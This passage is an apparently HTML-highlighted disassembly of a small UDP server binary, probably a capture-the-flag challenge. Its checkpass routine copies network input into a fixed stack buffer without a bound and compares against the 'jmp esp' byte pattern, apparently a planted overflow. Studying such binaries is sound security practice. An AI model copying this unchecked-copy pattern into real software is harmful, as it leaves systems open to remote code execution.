class="x" 80487a6: 90 nop/span/span span class="code-line"span class="x" 80487a7: 90 nop/span/span span class="code-line"span class="x" 80487a8: 90 nop/span/span span class="code-line"span class="x" 80487a9: 90 nop/span/span span class="code-line"span class="x" 80487aa: 90 nop/span/span span class="code-line"span class="x" 80487ab: 90 nop/span/span span class="code-line"span class="x" 80487ac: 90 nop/span/span span class="code-line"span class="x" 80487ad: 90 nop/span/span span class="code-line"span class="x" 80487ae: 90 nop/span/span span class="code-line"span class="x" 80487af: 90 nop/span/span span class="code-line"/span span class="code-line"span class="mh"080487b0/span span class="p"lt;/spanspan class="nf"deregister_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487b0: b8 6f 91 04 08 mov eax,0x804916f/span/span span class="code-line"span class="x" 80487b5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ba: 83 f8 06 cmp eax,0x6/span/span span class="code-line"span class="x" 80487bd: 77 02 ja 80487c1 lt;deregister_tm_clones+0x11gt;/span/span span class="code-line"span class="x" 80487bf: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487c1: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 80487c6: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 80487c8: 74 f5 je 80487bf lt;deregister_tm_clones+0xfgt;/span/span span class="code-line"span class="x" 80487ca: 55 push ebp/span/span span class="code-line"span class="x" 80487cb: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 80487cd: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 80487d0: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 80487d7: ff d0 call eax/span/span span class="code-line"span class="x" 80487d9: c9 leave /span/span span class="code-line"span class="x" 80487da: c3 ret /span/span span 
class="code-line"span class="x" 80487db: 90 nop/span/span span class="code-line"span class="x" 80487dc: 8d 74 26 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"080487e0/span span class="p"lt;/spanspan class="nf"register_tm_clones/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 80487e0: b8 6c 91 04 08 mov eax,0x804916c/span/span span class="code-line"span class="x" 80487e5: 2d 6c 91 04 08 sub eax,0x804916c/span/span span class="code-line"span class="x" 80487ea: c1 f8 02 sar eax,0x2/span/span span class="code-line"span class="x" 80487ed: 89 c2 mov edx,eax/span/span span class="code-line"span class="x" 80487ef: c1 ea 1f shr edx,0x1f/span/span span class="code-line"span class="x" 80487f2: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80487f4: d1 f8 sar eax,1/span/span span class="code-line"span class="x" 80487f6: 75 02 jne 80487fa lt;register_tm_clones+0x1agt;/span/span span class="code-line"span class="x" 80487f8: f3 c3 repz ret /span/span span class="code-line"span class="x" 80487fa: ba 00 00 00 00 mov edx,0x0/span/span span class="code-line"span class="x" 80487ff: 85 d2 test edx,edx/span/span span class="code-line"span class="x" 8048801: 74 f5 je 80487f8 lt;register_tm_clones+0x18gt;/span/span span class="code-line"span class="x" 8048803: 55 push ebp/span/span span class="code-line"span class="x" 8048804: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048806: 83 ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048809: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804880d: c7 04 24 6c 91 04 08 mov DWORD PTR [esp],0x804916c/span/span span class="code-line"span class="x" 8048814: ff d2 call edx/span/span span class="code-line"span class="x" 8048816: c9 leave /span/span span class="code-line"span class="x" 8048817: c3 ret /span/span span class="code-line"span class="x" 8048818: 90 nop/span/span span 
class="code-line"span class="x" 8048819: 8d b4 26 00 00 00 00 lea esi,[esi+eiz*1+0x0]/span/span span class="code-line"/span span class="code-line"span class="mh"08048820/span span class="p"lt;/spanspan class="nf"__do_global_dtors_aux/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048820: 80 3d 6c 91 04 08 00 cmp BYTE PTR ds:0x804916c,0x0/span/span span class="code-line"span class="x" 8048827: 75 13 jne 804883c lt;__do_global_dtors_aux+0x1cgt;/span/span span class="code-line"span class="x" 8048829: 55 push ebp/span/span span class="code-line"span class="x" 804882a: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804882c: 83 ec 08 sub esp,0x8/span/span span class="code-line"span class="x" 804882f: e8 7c ff ff ff call 80487b0 lt;deregister_tm_clonesgt;/span/span span class="code-line"span class="x" 8048834: c6 05 6c 91 04 08 01 mov BYTE PTR ds:0x804916c,0x1/span/span span class="code-line"span class="x" 804883b: c9 leave /span/span span class="code-line"span class="x" 804883c: f3 c3 repz ret /span/span span class="code-line"span class="x" 804883e: 66 90 xchg ax,ax/span/span span class="code-line"/span span class="code-line"span class="mh"08048840/span span class="p"lt;/spanspan class="nf"frame_dummy/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048840: a1 08 90 04 08 mov eax,ds:0x8049008/span/span span class="code-line"span class="x" 8048845: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048847: 74 1e je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048849: b8 00 00 00 00 mov eax,0x0/span/span span class="code-line"span class="x" 804884e: 85 c0 test eax,eax/span/span span class="code-line"span class="x" 8048850: 74 15 je 8048867 lt;frame_dummy+0x27gt;/span/span span class="code-line"span class="x" 8048852: 55 push ebp/span/span span class="code-line"span class="x" 8048853: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048855: 83 
ec 18 sub esp,0x18/span/span span class="code-line"span class="x" 8048858: c7 04 24 08 90 04 08 mov DWORD PTR [esp],0x8049008/span/span span class="code-line"span class="x" 804885f: ff d0 call eax/span/span span class="code-line"span class="x" 8048861: c9 leave /span/span span class="code-line"span class="x" 8048862: e9 79 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"span class="x" 8048867: e9 74 ff ff ff jmp 80487e0 lt;register_tm_clonesgt;/span/span span class="code-line"/span span class="code-line"span class="mh"0804886c/span span class="p"lt;/spanspan class="nf"main/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 804886c: 55 push ebp/span/span span class="code-line"span class="x" 804886d: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 804886f: 83 e4 f0 and esp,0xfffffff0/span/span span class="code-line"span class="x" 8048872: 81 ec 40 04 00 00 sub esp,0x440/span/span span class="code-line"span class="x" 8048878: c7 44 24 08 00 00 00 mov DWORD PTR [esp+0x8],0x0/span/span span class="code-line"span class="x" 804887f: 00 /span/span span class="code-line"span class="x" 8048880: c7 44 24 04 01 00 00 mov DWORD PTR [esp+0x4],0x1/span/span span class="code-line"span class="x" 8048887: 00 /span/span span class="code-line"span class="x" 8048888: c7 04 24 02 00 00 00 mov DWORD PTR [esp],0x2/span/span span class="code-line"span class="x" 804888f: e8 cc fe ff ff call 8048760 lt;[email protected];/span/span span class="code-line"span class="x" 8048894: 89 84 24 3c 04 00 00 mov DWORD PTR [esp+0x43c],eax/span/span span class="code-line"span class="x" 804889b: c7 44 24 04 10 00 00 mov DWORD PTR [esp+0x4],0x10/span/span span class="code-line"span class="x" 80488a2: 00 /span/span span class="code-line"span class="x" 80488a3: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488aa: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80488ad: 
e8 8e fd ff ff call 8048640 lt;[email protected];/span/span span class="code-line"span class="x" 80488b2: 66 c7 84 24 20 04 00 mov WORD PTR [esp+0x420],0x2/span/span span class="code-line"span class="x" 80488b9: 00 02 00 /span/span span class="code-line"span class="x" 80488bc: c7 04 24 00 00 00 00 mov DWORD PTR [esp],0x0/span/span span class="code-line"span class="x" 80488c3: e8 68 fe ff ff call 8048730 lt;[email protected];/span/span span class="code-line"span class="x" 80488c8: 89 84 24 24 04 00 00 mov DWORD PTR [esp+0x424],eax/span/span span class="code-line"span class="x" 80488cf: c7 04 24 0f 27 00 00 mov DWORD PTR [esp],0x270f/span/span span class="code-line"span class="x" 80488d6: e8 a5 fd ff ff call 8048680 lt;[email protected];/span/span span class="code-line"span class="x" 80488db: 66 89 84 24 22 04 00 mov WORD PTR [esp+0x422],ax/span/span span class="code-line"span class="x" 80488e2: 00 /span/span span class="code-line"span class="x" 80488e3: c7 44 24 08 10 00 00 mov DWORD PTR [esp+0x8],0x10/span/span span class="code-line"span class="x" 80488ea: 00 /span/span span class="code-line"span class="x" 80488eb: 8d 84 24 20 04 00 00 lea eax,[esp+0x420]/span/span span class="code-line"span class="x" 80488f2: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80488f6: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 80488fd: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048900: e8 eb fd ff ff call 80486f0 lt;[email protected];/span/span span class="code-line"span class="x" 8048905: 89 84 24 38 04 00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 804890c: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 8048913: 00 /span/span span class="code-line"span class="x" 8048914: 74 20 je 8048936 lt;main+0xcagt;/span/span span class="code-line"span class="x" 8048916: c7 44 24 
04 0f 27 00 mov DWORD PTR [esp+0x4],0x270f/span/span span class="code-line"span class="x" 804891d: 00 /span/span span class="code-line"span class="x" 804891e: c7 04 24 90 8d 04 08 mov DWORD PTR [esp],0x8048d90/span/span span class="code-line"span class="x" 8048925: e8 06 fd ff ff call 8048630 lt;[email protected];/span/span span class="code-line"span class="x" 804892a: c7 04 24 01 00 00 00 mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="x" 8048931: e8 8a fd ff ff call 80486c0 lt;[email protected];/span/span span class="code-line"span class="x" 8048936: c7 44 24 04 00 04 00 mov DWORD PTR [esp+0x4],0x400/span/span span class="code-line"span class="x" 804893d: 00 /span/span span class="code-line"span class="x" 804893e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048945: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048948: e8 f3 fd ff ff call 8048740 lt;[email protected];/span/span span class="code-line"span class="x" 804894d: c7 84 24 0c 04 00 00 mov DWORD PTR [esp+0x40c],0x10/span/span span class="code-line"span class="x" 8048954: 10 00 00 00 /span/span span class="code-line"span class="x" 8048958: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804895f: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048963: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 804896a: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 804896e: 8b 84 24 3c 04 00 00 mov eax,DWORD PTR [esp+0x43c]/span/span span class="code-line"span class="x" 8048975: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048978: e8 13 fd ff ff call 8048690 lt;[email protected];/span/span span class="code-line"span class="x" 804897d: 89 84 24 34 04 00 00 mov DWORD PTR [esp+0x434],eax/span/span span 
class="code-line"span class="x" 8048984: 8d 84 24 0c 04 00 00 lea eax,[esp+0x40c]/span/span span class="code-line"span class="x" 804898b: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 804898f: 8d 84 24 10 04 00 00 lea eax,[esp+0x410]/span/span span class="code-line"span class="x" 8048996: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 804899a: c7 44 24 0c 00 00 00 mov DWORD PTR [esp+0xc],0x0/span/span span class="code-line"span class="x" 80489a1: 00 /span/span span class="code-line"span class="x" 80489a2: c7 44 24 08 e8 03 00 mov DWORD PTR [esp+0x8],0x3e8/span/span span class="code-line"span class="x" 80489a9: 00 /span/span span class="code-line"span class="x" 80489aa: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489ae: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 80489b2: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 80489b9: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489bc: e8 9f fc ff ff call 8048660 lt;[email protected];/span/span span class="code-line"span class="x" 80489c1: 89 84 24 30 04 00 00 mov DWORD PTR [esp+0x430],eax/span/span span class="code-line"span class="x" 80489c8: 8d 54 24 24 lea edx,[esp+0x24]/span/span span class="code-line"span class="x" 80489cc: 8b 84 24 30 04 00 00 mov eax,DWORD PTR [esp+0x430]/span/span span class="code-line"span class="x" 80489d3: 01 d0 add eax,edx/span/span span class="code-line"span class="x" 80489d5: c6 00 00 mov BYTE PTR [eax],0x0/span/span span class="code-line"span class="x" 80489d8: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 80489dc: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 80489df: e8 a8 02 00 00 call 8048c8c lt;checkpassgt;/span/span span class="code-line"span class="x" 80489e4: 89 84 24 38 04 
00 00 mov DWORD PTR [esp+0x438],eax/span/span span class="code-line"span class="x" 80489eb: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x0/span/span span class="code-line"span class="x" 80489f2: 00 /span/span span class="code-line"span class="x" 80489f3: 0f 84 8c 00 00 00 je 8048a85 lt;main+0x219gt;/span/span span class="code-line"span class="x" 80489f9: 83 bc 24 38 04 00 00 cmp DWORD PTR [esp+0x438],0x5/span/span span class="code-line"span class="x" 8048a00: 05 /span/span span class="code-line"span class="x" 8048a01: 74 45 je 8048a48 lt;main+0x1dcgt;/span/span span class="code-line"span class="x" 8048a03: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048a07: 89 44 24 14 mov DWORD PTR [esp+0x14],eax/span/span span class="code-line"span class="x" 8048a0b: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a12: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a16: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a1d: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a21: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a28: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a2c: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a33: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a37: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a3e: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a41: e8 41 01 00 00 call 8048b87 lt;senderrorgt;/span/span span class="code-line"span class="x" 8048a46: eb 78 jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 
8048a48: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a4f: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a53: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a5a: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a5e: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048a65: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048a69: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048a70: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span class="code-line"span class="x" 8048a74: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048a7b: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048a7e: e8 76 01 00 00 call 8048bf9 lt;sendtokengt;/span/span span class="code-line"span class="x" 8048a83: eb 3b jmp 8048ac0 lt;main+0x254gt;/span/span span class="code-line"span class="x" 8048a85: 8b 84 24 10 04 00 00 mov eax,DWORD PTR [esp+0x410]/span/span span class="code-line"span class="x" 8048a8c: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048a90: 8b 84 24 14 04 00 00 mov eax,DWORD PTR [esp+0x414]/span/span span class="code-line"span class="x" 8048a97: 89 44 24 08 mov DWORD PTR [esp+0x8],eax/span/span span class="code-line"span class="x" 8048a9b: 8b 84 24 18 04 00 00 mov eax,DWORD PTR [esp+0x418]/span/span span class="code-line"span class="x" 8048aa2: 89 44 24 0c mov DWORD PTR [esp+0xc],eax/span/span span class="code-line"span class="x" 8048aa6: 8b 84 24 1c 04 00 00 mov eax,DWORD PTR [esp+0x41c]/span/span span class="code-line"span class="x" 8048aad: 89 44 24 10 mov DWORD PTR [esp+0x10],eax/span/span span 
class="code-line"span class="x" 8048ab1: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ab8: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048abb: e8 34 00 00 00 call 8048af4 lt;sendfilegt;/span/span span class="code-line"span class="x" 8048ac0: c7 04 24 b2 8d 04 08 mov DWORD PTR [esp],0x8048db2/span/span span class="code-line"span class="x" 8048ac7: e8 d4 fb ff ff call 80486a0 lt;[email protected];/span/span span class="code-line"span class="x" 8048acc: 8d 44 24 24 lea eax,[esp+0x24]/span/span span class="code-line"span class="x" 8048ad0: 89 44 24 04 mov DWORD PTR [esp+0x4],eax/span/span span class="code-line"span class="x" 8048ad4: c7 04 24 ca 8d 04 08 mov DWORD PTR [esp],0x8048dca/span/span span class="code-line"span class="x" 8048adb: e8 50 fb ff ff call 8048630 lt;[email protected];/span/span span class="code-line"span class="x" 8048ae0: 8b 84 24 34 04 00 00 mov eax,DWORD PTR [esp+0x434]/span/span span class="code-line"span class="x" 8048ae7: 89 04 24 mov DWORD PTR [esp],eax/span/span span class="code-line"span class="x" 8048aea: e8 81 fc ff ff call 8048770 lt;[email protected];/span/span span class="code-line"span class="x" 8048aef: e9 59 fe ff ff jmp 804894d lt;main+0xe1gt;/span/span span class="code-line"/span span class="code-line"span class="mh"08048af4/span span class="p"lt;/spanspan class="nf"sendfile/spanspan class="p"gt;:/span/span span class="code-line"span class="x" 8048af4: 55 push ebp/span/span span class="code-line"span class="x" 8048af5: 89 e5 mov ebp,esp/span/span span class="code-line"span class="x" 8048af7: 83 ec 38 sub esp,0x38/span/span span class="code-line"span class="x" 8048afa: c7 44 24 04 cd 8d 04 mov DWORD PTR [esp+0x4],0x8048dcd/span/span span class="code-line"span class="x" 8048b01: 08 /span/span span class="code-line"span class="x" 8048b02: c7 04 24 cf 8d 04 08 mov DWORD PTR [esp],0x8048dcf/span/span span class="code-line"span class="x" 
```text
 8048b09: e8 f2 fb ff ff        call   8048700 <[email protected]>
 8048b0e: 89 45 f4              mov    DWORD PTR [ebp-0xc],eax
 8048b11: 83 7d f4 00           cmp    DWORD PTR [ebp-0xc],0x0
 8048b15: 74 56                 je     8048b6d <sendfile+0x79>
 8048b17: eb 31                 jmp    8048b4a <sendfile+0x56>
 8048b19: c7 44 24 14 10 00 00  mov    DWORD PTR [esp+0x14],0x10
 8048b20: 00
 8048b21: 8d 45 0c              lea    eax,[ebp+0xc]
 8048b24: 89 44 24 10           mov    DWORD PTR [esp+0x10],eax
 8048b28: c7 44 24 0c 00 00 00  mov    DWORD PTR [esp+0xc],0x0
 8048b2f: 00
 8048b30: c7 44 24 08 01 00 00  mov    DWORD PTR [esp+0x8],0x1
 8048b37: 00
 8048b38: 8d 45 f0              lea    eax,[ebp-0x10]
 8048b3b: 89 44 24 04           mov    DWORD PTR [esp+0x4],eax
 8048b3f: 8b 45 08              mov    eax,DWORD PTR [ebp+0x8]
 8048b42: 89 04 24              mov    DWORD PTR [esp],eax
 8048b45: e8 d6 fb ff ff        call   8048720 <[email protected]>
 8048b4a: 8b 45 f4              mov    eax,DWORD PTR [ebp-0xc]
 8048b4d: 89 04 24              mov    DWORD PTR [esp],eax
 8048b50: e8 1b fb ff ff        call   8048670 <[email protected]>
 8048b55: 89 45 f0              mov    DWORD PTR [ebp-0x10],eax
 8048b58: 8b 45 f0              mov    eax,DWORD PTR [ebp-0x10]
 8048b5b: 83 f8 ff              cmp    eax,0xffffffff
 8048b5e: 75 b9                 jne    8048b19 <sendfile+0x25>
 8048b60: 8b 45 f4              mov    eax,DWORD PTR [ebp-0xc]
 8048b63: 89 04 24              mov    DWORD PTR [esp],eax
 8048b66: e8 e5 fa ff ff        call   8048650 <[email protected]>
 8048b6b: eb 18                 jmp    8048b85 <sendfile+0x91>
 8048b6d: c7 04 24 dc 8d 04 08  mov    DWORD PTR [esp],0x8048ddc
 8048b74: e8 27 fb ff ff        call   80486a0 <[email protected]>
 8048b79: c7 04 24 01 00 00 00  mov    DWORD PTR [esp],0x1
 8048b80: e8 3b fb ff ff        call   80486c0 <[email protected]>
 8048b85: c9                    leave
 8048b86: c3                    ret

08048b87 <senderror>:
 8048b87: 55                    push   ebp
 8048b88: 89 e5                 mov    ebp,esp
 8048b8a: 83 ec 28              sub    esp,0x28
 8048b8d: c7 44 24 14 10 00 00  mov    DWORD PTR [esp+0x14],0x10
 8048b94: 00
 8048b95: 8d 45 0c              lea    eax,[ebp+0xc]
 8048b98: 89 44 24 10           mov    DWORD PTR [esp+0x10],eax
 8048b9c: c7 44 24 0c 00 00 00  mov    DWORD PTR [esp+0xc],0x0
 8048ba3: 00
 8048ba4: c7 44 24 08 10 00 00  mov    DWORD PTR [esp+0x8],0x10
 8048bab: 00
 8048bac: c7 44 24 04 fb 8d 04  mov    DWORD PTR [esp+0x4],0x8048dfb
 8048bb3: 08
 8048bb4: 8b 45 08              mov    eax,DWORD PTR [ebp+0x8]
 8048bb7: 89 04 24              mov    DWORD PTR [esp],eax
 8048bba: e8 61 fb ff ff        call   8048720 <[email protected]>
 8048bbf: 8b 45 1c              mov    eax,DWORD PTR [ebp+0x1c]
 8048bc2: 89 04 24              mov    DWORD PTR [esp],eax
 8048bc5: e8 06 fb ff ff        call   80486d0 <[email protected]>
 8048bca: c7 44 24 14 10 00 00  mov    DWORD PTR [esp+0x14],0x10
 8048bd1: 00
 8048bd2: 8d 55 0c              lea    edx,[ebp+0xc]
 8048bd5: 89 54 24 10           mov    DWORD PTR [esp+0x10],edx
 8048bd9: c7 44 24 0c 00 00 00  mov    DWORD PTR [esp+0xc],0x0
 8048be0: 00
 8048be1: 89 44 24 08           mov    DWORD PTR [esp+0x8],eax
 8048be5: 8b 45 1c              mov    eax,DWORD PTR [ebp+0x1c]
 8048be8: 89 44 24 04           mov    DWORD PTR [esp+0x4],eax
 8048bec: 8b 45 08              mov    eax,DWORD PTR [ebp+0x8]
 8048bef: 89 04 24              mov    DWORD PTR [esp],eax
 8048bf2: e8 29 fb ff ff        call   8048720 <[email protected]>
 8048bf7: c9                    leave
 8048bf8: c3                    ret

08048bf9 <sendtoken>:
 8048bf9: 55                    push   ebp
 8048bfa: 89 e5                 mov    ebp,esp
 8048bfc: 83 ec 38              sub    esp,0x38
 8048bff: c7 44 24 04 cd 8d 04  mov    DWORD PTR [esp+0x4],0x8048dcd
 8048c06: 08
 8048c07: c7 04 24 0c 8e 04 08  mov    DWORD PTR [esp],0x8048e0c
 8048c0e: e8 ed fa ff ff        call   8048700 <[email protected]>
 8048c13: 89 45 f4              mov    DWORD PTR [ebp-0xc],eax
 8048c16: 83 7d f4 00           cmp    DWORD PTR [ebp-0xc],0x0
 8048c1a: 74 56                 je     8048c72 <sendtoken+0x79>
 8048c1c: eb 31                 jmp    8048c4f <sendtoken+0x56>
 8048c1e: c7 44 24 14 10 00 00  mov    DWORD PTR [esp+0x14],0x10
 8048c25: 00
 8048c26: 8d 45 0c              lea    eax,[ebp+0xc]
 8048c29: 89 44 24 10           mov    DWORD PTR [esp+0x10],eax
 8048c2d: c7 44 24 0c 00 00 00  mov    DWORD PTR [esp+0xc],0x0
 8048c34: 00
 8048c35: c7 44 24 08 01 00 00  mov    DWORD PTR [esp+0x8],0x1
 8048c3c: 00
 8048c3d: 8d 45 f0              lea    eax,[ebp-0x10]
 8048c40: 89 44 24 04           mov    DWORD PTR [esp+0x4],eax
 8048c44: 8b 45 08              mov    eax,DWORD PTR [ebp+0x8]
 8048c47: 89 04 24              mov    DWORD PTR [esp],eax
 8048c4a: e8 d1 fa ff ff        call   8048720 <[email protected]>
 8048c4f: 8b 45 f4              mov    eax,DWORD PTR [ebp-0xc]
 8048c52: 89 04 24              mov    DWORD PTR [esp],eax
 8048c55: e8 16 fa ff ff        call   8048670 <[email protected]>
 8048c5a: 89 45 f0              mov    DWORD PTR [ebp-0x10],eax
 8048c5d: 8b 45 f0              mov    eax,DWORD PTR [ebp-0x10]
 8048c60: 83 f8 ff              cmp    eax,0xffffffff
 8048c63: 75 b9                 jne    8048c1e <sendtoken+0x25>
 8048c65: 8b 45 f4              mov    eax,DWORD PTR [ebp-0xc]
 8048c68: 89 04 24              mov    DWORD PTR [esp],eax
 8048c6b: e8 e0 f9 ff ff        call   8048650 <[email protected]>
 8048c70: eb 18                 jmp    8048c8a <sendtoken+0x91>
 8048c72: c7 04 24 12 8e 04 08  mov    DWORD PTR [esp],0x8048e12
 8048c79: e8 22 fa ff ff        call   80486a0 <[email protected]>
 8048c7e: c7 04 24 01 00 00 00  mov    DWORD PTR [esp],0x1
 8048c85: e8 36 fa ff ff        call   80486c0 <[email protected]>
 8048c8a: c9                    leave
 8048c8b: c3                    ret

08048c8c <checkpass>:
 8048c8c: 55                    push   ebp
 8048c8d: 89 e5                 mov    ebp,esp
 8048c8f: 81 ec 28 02 00 00     sub    esp,0x228
 8048c95: 8b 45 08              mov    eax,DWORD PTR [ebp+0x8]
 8048c98: 89 04 24              mov    DWORD PTR [esp],eax
 8048c9b: e8 30 fa ff ff        call   80486d0 <[email protected]>
 8048ca0: 83 c0 01              add    eax,0x1
 8048ca3: 89 44 24 08           mov    DWORD PTR [esp+0x8],eax
 8048ca7: 8b 45 08              mov    eax,DWORD PTR [ebp+0x8]
 8048caa: 89 44 24 04           mov    DWORD PTR [esp+0x4],eax
 8048cae: 8d 85 f0 fd ff ff     lea    eax,[ebp-0x210]
 8048cb4: 89 04 24              mov    DWORD PTR [esp],eax
 8048cb7: e8 54 fa ff ff        call   8048710 <[email protected]>
 8048cbc: 8d 85 f0 fd ff ff     lea    eax,[ebp-0x210]
 8048cc2: 89 04 24              mov    DWORD PTR [esp],eax
 8048cc5: e8 86 fa ff ff        call   8048750 <[email protected]>
 8048cca: 89 45 f0              mov    DWORD PTR [ebp-0x10],eax
 8048ccd: 81 7d f0 ff e4 00 00  cmp    DWORD PTR [ebp-0x10],0xe4ff
 8048cd4: 75 09                 jne    8048cdf <checkpass+0x53>
 8048cd6: c7 45 f4 05 00 00 00  mov    DWORD PTR [ebp-0xc],0x5
 8048cdd: eb 19                 jmp    8048cf8 <checkpass+0x6c>
 8048cdf: c7 44 24 04 2c 8e 04  mov    DWORD PTR [esp+0x4],0x8048e2c
 8048ce6: 08
 8048ce7: 8d 85 f0 fd ff ff     lea    eax,[ebp-0x210]
 8048ced: 89 04 24              mov    DWORD PTR [esp],eax
 8048cf0: e8 2b f9 ff ff        call   8048620 <[email protected]>
 8048cf5: 89 45 f4              mov    DWORD PTR [ebp-0xc],eax
 8048cf8: 8b 45 f4              mov    eax,DWORD PTR [ebp-0xc]
 8048cfb: c9                    leave
 8048cfc: c3                    ret
 8048cfd: 90                    nop
 8048cfe: 90                    nop
 8048cff: 90                    nop

08048d00 <__libc_csu_fini>:
 8048d00: 55                    push   ebp
 8048d01: 89 e5                 mov    ebp,esp
 8048d03: 5d                    pop    ebp
 8048d04: c3                    ret
 8048d05: 8d 74 26 00           lea    esi,[esi+eiz*1+0x0]
 8048d09: 8d bc 27 00 00 00 00  lea    edi,[edi+eiz*1+0x0]

08048d10 <__libc_csu_init>:
 8048d10: 55                    push   ebp
 8048d11: 89 e5                 mov    ebp,esp
 8048d13: 57                    push   edi
 8048d14: 56                    push   esi
 8048d15: 53                    push   ebx
 8048d16: e8 4f 00 00 00        call   8048d6a <__i686.get_pc_thunk.bx>
 8048d1b: 81 c3 e5 03 00 00     add    ebx,0x3e5
 8048d21: 83 ec 1c              sub    esp,0x1c
 8048d24: e8 b7 f8 ff ff        call   80485e0 <_init>
 8048d29: 8d bb 04 ff ff ff     lea    edi,[ebx-0xfc]
 8048d2f: 8d 83 00 ff ff ff     lea    eax,[ebx-0x100]
 8048d35: 29 c7                 sub    edi,eax
 8048d37: c1 ff 02              sar    edi,0x2
 8048d3a: 85 ff                 test   edi,edi
 8048d3c: 74 24                 je     8048d62 <__libc_csu_init+0x52>
 8048d3e: 31 f6                 xor    esi,esi
 8048d40: 8b 45 10              mov    eax,DWORD PTR [ebp+0x10]
 8048d43: 89 44 24 08           mov    DWORD PTR [esp+0x8],eax
